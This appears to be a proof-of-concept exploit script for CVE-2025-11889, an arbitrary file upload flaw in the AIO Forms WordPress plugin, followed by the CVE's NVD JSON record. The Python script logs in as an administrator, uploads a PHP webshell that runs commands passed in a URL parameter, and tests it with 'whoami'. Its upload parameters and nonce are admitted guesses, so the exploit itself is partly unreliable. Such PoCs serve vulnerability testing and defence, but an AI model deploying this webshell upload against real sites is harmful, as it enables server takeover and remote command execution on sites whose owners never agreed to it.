CVE-2025-11889

import requests import sys # CVE-2025-11889 PoC - AIO Forms WordPress Plugin Arbitrary File Upload # Target: WordPress site with AIO Forms plugin <= 1.3.18 # Authenticated as Administrator or higher TARGET_URL = "http://target-wordpress-site.com" USERNAME = "admin" PASSWORD = "password" def get_auth_token(): """Obtain WordPress nonces and authentication cookies""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() # Get login page to obtain nonce response = session.get(login_url) # Attempt login login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies: print("[-] Authentication failed") return None, None print("[+] Authentication successful") return session, session.cookies def upload_webshell(session, cookies): """Upload malicious PHP file via import functionality""" # PHP webshell content webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Find the import endpoint import_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Prepare the malicious file files = { 'file': ('malicious.php', webshell, 'application/x-php') } # The actual parameter names may vary - this is a generic approach data = { 'action': 'aio_forms_import', 'nonce': 'extracted_nonce_here' } print("[*] Attempting to upload webshell...") response = session.post(import_url, files=files, data=data, cookies=cookies) # Check for successful upload if response.status_code == 200: print("[+] File upload may have succeeded") print(f"[+] Response: {response.text}") # Try to access the uploaded file webshell_url = f"{TARGET_URL}/wp-content/uploads/malicious.php" test_response = session.get(webshell_url, params={'cmd': 'whoami'}) if test_response.status_code == 200: print(f"[+] Webshell uploaded! Access at: {webshell_url}") print(f"[+] Command output: {test_response.text}") return True print("[-] Upload failed or target not vulnerable") return False if __name__ == "__main__": session, cookies = get_auth_token() if session: upload_webshell(session, cookies) # Note: This PoC requires valid administrator credentials. # The actual exploitation may require additional enumeration to find # the correct upload endpoint and parameter names.

{"cve": {"id": "CVE-2025-11889", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:43.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AIO Forms – Craft Complex Forms Easily plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import functionality in all versions up to, and including, 1.3.18. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400661%40all-in-one-forms&new=3400661%40all-in-one-forms&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/all-in-one-forms/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc69491-0f40-4bab-9215-b25f72110e26?source=cve", "source": "[email protected]"}]}}